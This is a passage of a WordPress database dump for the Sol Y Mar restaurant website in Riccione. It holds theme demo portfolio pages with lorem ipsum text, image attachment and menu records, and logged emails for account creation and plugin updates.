enable_category=\"no\"][/vc_column][/vc_row]</p>\n','FIve Columns Gallery Wide','','publish','closed','closed','','five-columns-gallery-wide','','','2018-09-14 09:09:13','2018-09-14 09:09:13','',3061,'http://attika.mikado-themes.com/?page_id=2843',0,'page','',0),(2857,1,'2018-09-14 09:24:58','2018-09-14 09:24:58','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"six\" space_between_items=\"normal\" number_of_items=\"12\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" category=\"new\"][/vc_column][/vc_row]','Six Columns Gallery Wide','','publish','closed','closed','','six-columns-gallery-wide','','','2018-09-14 09:24:58','2018-09-14 09:24:58','',3061,'http://attika.mikado-themes.com/?page_id=2857',0,'page','',0),(2620,1,'2018-09-03 10:10:13','2018-09-03 10:10:13','','landing-pop-up-bottom-sheet','','inherit','open','closed','','landing-pop-up-bottom-sheet','','','2018-09-03 10:10:13','2018-09-03 10:10:13','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-pop-up-bottom-sheet.png',0,'attachment','image/png',0),(3701,0,'2021-01-07 00:59:28','2021-01-06 23:59:28','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi stanszoqcjq,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>stanszoqcjq</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','Sent ( ** Fallback ** )','private','closed','closed','','your-sol-y-mar-account-has-been-created-6','','','2021-01-07 00:59:28','2021-01-06 23:59:28','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created-6/',0,'postman_sent_mail','',0),(2899,1,'2018-09-17 07:44:10','2018-09-17 07:44:10','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','New Ice Cream','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','new-ice-cream','','','2018-09-17 07:44:10','2018-09-17 07:44:10','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2899',0,'portfolio-item','',0),(2900,1,'2018-09-17 07:45:29','2018-09-17 07:45:29','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Taste Floating Islands','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','taste-floating-islands','','','2018-09-17 07:45:29','2018-09-17 07:45:29','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2900',0,'portfolio-item','',0),(3700,0,'2021-01-07 00:59:28','2021-01-06 23:59:28','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi stanszoqcjq,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>stanszoqcjq</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','Incorrect authentication data\r\n','private','closed','closed','','your-sol-y-mar-account-has-been-created-5','','','2021-01-07 00:59:28','2021-01-06 23:59:28','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created-5/',0,'postman_sent_mail','',0),(2904,1,'2018-09-17 07:52:01','2018-09-17 07:52:01','','6','','publish','closed','closed','','6','','','2018-09-17 07:52:01','2018-09-17 07:52:01','',0,'http://attika.mikado-themes.com/?post_type=testimonials&amp;p=2904',0,'testimonials','',0),(2905,1,'2018-09-17 07:52:04','2018-09-17 07:52:04','','5','','publish','closed','closed','','5','','','2018-09-17 07:52:04','2018-09-17 07:52:04','',0,'http://attika.mikado-themes.com/?post_type=testimonials&amp;p=2905',0,'testimonials','',0),(2906,1,'2018-09-17 07:50:27','2018-09-17 07:50:27','','4','','publish','closed','closed','','4','','','2018-09-17 07:50:27','2018-09-17 07:50:27','',0,'http://attika.mikado-themes.com/?post_type=testimonials&amp;p=2906',0,'testimonials','',0),(2768,1,'2018-09-05 08:17:44','2018-09-05 08:17:44','','landing-vector-img-10','','inherit','open','closed','','landing-vector-img-10','','','2018-09-05 08:17:44','2018-09-05 08:17:44','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-10.png',0,'attachment','image/png',0),(2782,1,'2018-09-05 08:58:51','2018-09-05 08:58:51','','landing-vector-img-13','','inherit','open','closed','','landing-vector-img-13','','','2018-09-05 08:58:51','2018-09-05 08:58:51','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-13.png',0,'attachment','image/png',0),(2925,1,'2018-09-17 10:14:16','2018-09-17 10:14:16','','h2-rev-img-5','','inherit','open','closed','','h2-rev-img-5-2','','','2018-09-17 10:14:16','2018-09-17 10:14:16','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h2-rev-img-5-1.jpg',0,'attachment','image/jpeg',0),(2734,1,'2018-09-04 13:24:54','2018-09-04 13:24:54','','landing-vector-img-4','','inherit','open','closed','','landing-vector-img-4','','','2018-09-04 13:24:54','2018-09-04 13:24:54','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-4.png',0,'attachment','image/png',0),(3702,0,'2021-01-07 01:23:04','2021-01-07 00:23:04','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Akismet Anti-Spam (from version 4.1.7 to 4.1.8)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-20','','','2021-01-07 01:23:04','2021-01-07 00:23:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-20/',0,'postman_sent_mail','',0),(3703,0,'2021-01-07 01:23:04','2021-01-07 00:23:04','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Akismet Anti-Spam (from version 4.1.7 to 4.1.8)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-21','','','2021-01-07 01:23:04','2021-01-07 00:23:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-21/',0,'postman_sent_mail','',0),(3704,0,'2021-01-07 12:27:10','2021-01-07 11:27:10','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi jilzwxkumqq,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>jilzwxkumqq</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','','private','closed','closed','','your-sol-y-mar-account-has-been-created-7','','','2021-01-07 12:27:10','2021-01-07 11:27:10','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created-7/',0,'postman_sent_mail','',0),(3705,0,'2021-01-09 13:24:05','2021-01-09 12:24:05','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WP Mail SMTP Plugin by Mail Bank (from version 4.0.12 to 4.0.13)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-22','','','2021-01-09 13:24:05','2021-01-09 12:24:05','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-22/',0,'postman_sent_mail','',0),(3706,0,'2021-01-09 13:24:05','2021-01-09 12:24:05','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WP Mail SMTP Plugin by Mail Bank (from version 4.0.12 to 4.0.13)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-23','','','2021-01-09 13:24:05','2021-01-09 12:24:05','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-23/',0,'postman_sent_mail','',0),(3707,0,'2021-01-12 13:23:38','2021-01-12 12:23:38','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL (from version 4.0.5 to 4.0.6)\n- Yoast SEO (from version 15.5 to 15.6)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-24','','','2021-01-12 13:23:38','2021-01-12 12:23:38','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-24/',0,'postman_sent_mail','',0),(3708,0,'2021-01-12 13:23:38','2021-01-12 12:23:38','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL (from version 4.0.5 to 4.0.6)\n- Yoast SEO (from version 15.5 to 15.6)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-25','','','2021-01-12 13:23:38','2021-01-12 12:23:38','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-25/',0,'postman_sent_mail','',0),(2941,1,'2018-09-17 11:00:48','2018-09-17 11:00:48','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.[/vc_column_text][/vc_column][/vc_row]','Season To Taste','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','season-to-taste-2','','','2018-09-17 11:00:48','2018-09-17 11:00:48','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2941',0,'portfolio-item','',0),(2942,1,'2018-09-17 11:01:27','2018-09-17 11:01:27','[vc_row][vc_column][vc_column_text]\r\n<h3>crispy\r\nsesame\r\ncake</h3>\r\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit.[/vc_column_text][/vc_column][/vc_row]','Peach sorbet','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','peach-sorbet-2','','','2020-12-06 18:30:29','2020-12-06 17:30:29','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&#038;p=2942',0,'portfolio-item','',0),(2766,1,'2018-09-05 08:08:11','2018-09-05 08:08:11','','landing-img-8','','inherit','open','closed','','landing-img-8','','','2018-09-05 08:08:11','2018-09-05 08:08:11','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-8.jpg',0,'attachment','image/jpeg',0),(2224,1,'2018-08-27 15:32:01','2018-08-27 15:32:01','','kitchen-img-gallery-2','','inherit','open','closed','','kitchen-img-gallery-2','','','2018-08-27 15:32:01','2018-08-27 15:32:01','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-img-gallery-2.jpg',0,'attachment','image/jpeg',0),(2567,1,'2018-09-03 08:05:33','2018-09-03 08:05:33','','probaaaa-land','','inherit','open','closed','','probaaaa-land','','','2018-09-03 08:05:33','2018-09-03 08:05:33','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/probaaaa-land.jpg',0,'attachment','image/jpeg',0),(2915,1,'2018-09-17 08:54:04','2018-09-17 08:54:04','','h5-rev-img-5','','inherit','open','closed','','h5-rev-img-5-2','','','2018-09-17 08:54:04','2018-09-17 08:54:04','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h5-rev-img-5.png',0,'attachment','image/png',0),(2722,1,'2018-09-04 11:45:29','2018-09-04 11:45:29','','h4-img-3','','inherit','open','closed','','h4-img-3-2','','','2018-09-04 11:45:29','2018-09-04 11:45:29','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-3-1.jpg',0,'attachment','image/jpeg',0),(2780,1,'2018-09-05 08:58:21','2018-09-05 08:58:21','','landing-vector-img-12','','inherit','open','closed','','landing-vector-img-12','','','2018-09-05 08:58:21','2018-09-05 08:58:21','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-12.png',0,'attachment','image/png',0),(2923,1,'2018-09-17 10:12:45','2018-09-17 10:12:45','','h2-rev-img-3','','inherit','open','closed','','h2-rev-img-3','','','2018-09-17 10:12:45','2018-09-17 10:12:45','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h2-rev-img-3.jpg',0,'attachment','image/jpeg',0),(2765,1,'2018-09-05 08:08:09','2018-09-05 08:08:09','','landing-img-7','','inherit','open','closed','','landing-img-7','','','2018-09-05 08:08:09','2018-09-05 08:08:09','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-7.jpg',0,'attachment','image/jpeg',0),(2781,1,'2018-09-05 08:58:47','2018-09-05 08:58:47','','landing-print-img-7','','inherit','open','closed','','landing-print-img-7','','','2018-09-05 08:58:47','2018-09-05 08:58:47','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-7.jpg',0,'attachment','image/jpeg',0),(2613,1,'2018-09-03 09:56:44','2018-09-03 09:56:44','','h5-img-17a','','inherit','open','closed','','h5-img-17a','','','2018-09-03 09:56:44','2018-09-03 09:56:44','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h5-img-17a.jpg',0,'attachment','image/jpeg',0),(2987,1,'2020-12-05 17:06:12','2020-12-05 16:06:12','','Home','','publish','closed','closed','','home','','','2020-12-05 17:06:12','2020-12-05 16:06:12','',0,'https://www.ristorantesolymar.it/2020/12/05/home/',1,'nav_menu_item','',0),(2988,1,'2020-12-05 17:06:12','2020-12-05 16:06:12','','Pages','','publish','closed','closed','','pages','','','2020-12-05 17:06:12','2020-12-05 16:06:12','',0,'https://www.ristorantesolymar.it/2020/12/05/pages/',11,'nav_menu_item','',0),(2989,1,'2020-12-05 17:06:12','2020-12-05 16:06:12','','Blog','','publish','closed','closed','','blog','','','2020-12-05 17:06:12','2020-12-05 16:06:12','',0,'https://www.ristorantesolymar.it/2020/12/05/blog/',22,'nav_menu_item','',0),(2990,1,'2020-12-05 17:06:12','2020-12-05 16:06:12','','Shop','','publish','closed','closed','','shop','','','2020-12-05 17:06:12','2020-12-05 16:06:12','',0,'https://www.ristorantesolymar.it/2020/12/05/shop/',33,'nav_menu_item','',0),(2991,1,'2020-12-05 17:06:12','2020-12-05 16:06:12','','Portfolio','','publish','closed','closed','','portfolio','','','2020-12-05 17:06:12','2020-12-05 16:06:12','',0,'https://www.ristorantesolymar.it/2020/12/05/portfolio/',45,'nav_menu_item','',0),(2992,1,'2020-12-05 17:06:12','2020-12-05 16:06:12','','Elements','','publish','closed','closed','','elements','','','2020-12-05 17:06:12','2020-12-05 16:06:12','',0,'https://www.ristorantesolymar.it/2020/12/05/elements/',68,'nav_menu_item','',0),(2993,1,'2018-08-13 08:31:03','2018-08-13 08:31:03','.mkdf-footer-bottom-holder .mkdf-grid-col-12 .widget_media_image:first-child {\n	margin-top: -75px;\n}','attika','','publish','closed','closed','','attika','','','2018-08-13 08:31:03','2018-08-13 08:31:03','',0,'http://attika.mikado-themes.com/attika/',0,'custom_css','',0),(2994,1,'2020-12-05 17:06:12','2020-12-05 16:06:12','','Home','','publish','closed','closed','','home-2','','','2020-12-05 17:06:12','2020-12-05 16:06:12','',0,'https://www.ristorantesolymar.it/2020/12/05/home-2/',1,'nav_menu_item','',0),(2995,1,'2020-12-05 17:06:12','2020-12-05 16:06:12','','Pages','','publish','closed','closed','','pages-2','','','2020-12-05 17:06:12','2020-12-05 16:06:12','',0,'https://www.ristorantesolymar.it/2020/12/05/pages-2/',11,'nav_menu_item','',0),(2996,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Portfolio','','publish','closed','closed','','portfolio-2','','','2020-12-05 17:06:13','2020-12-05 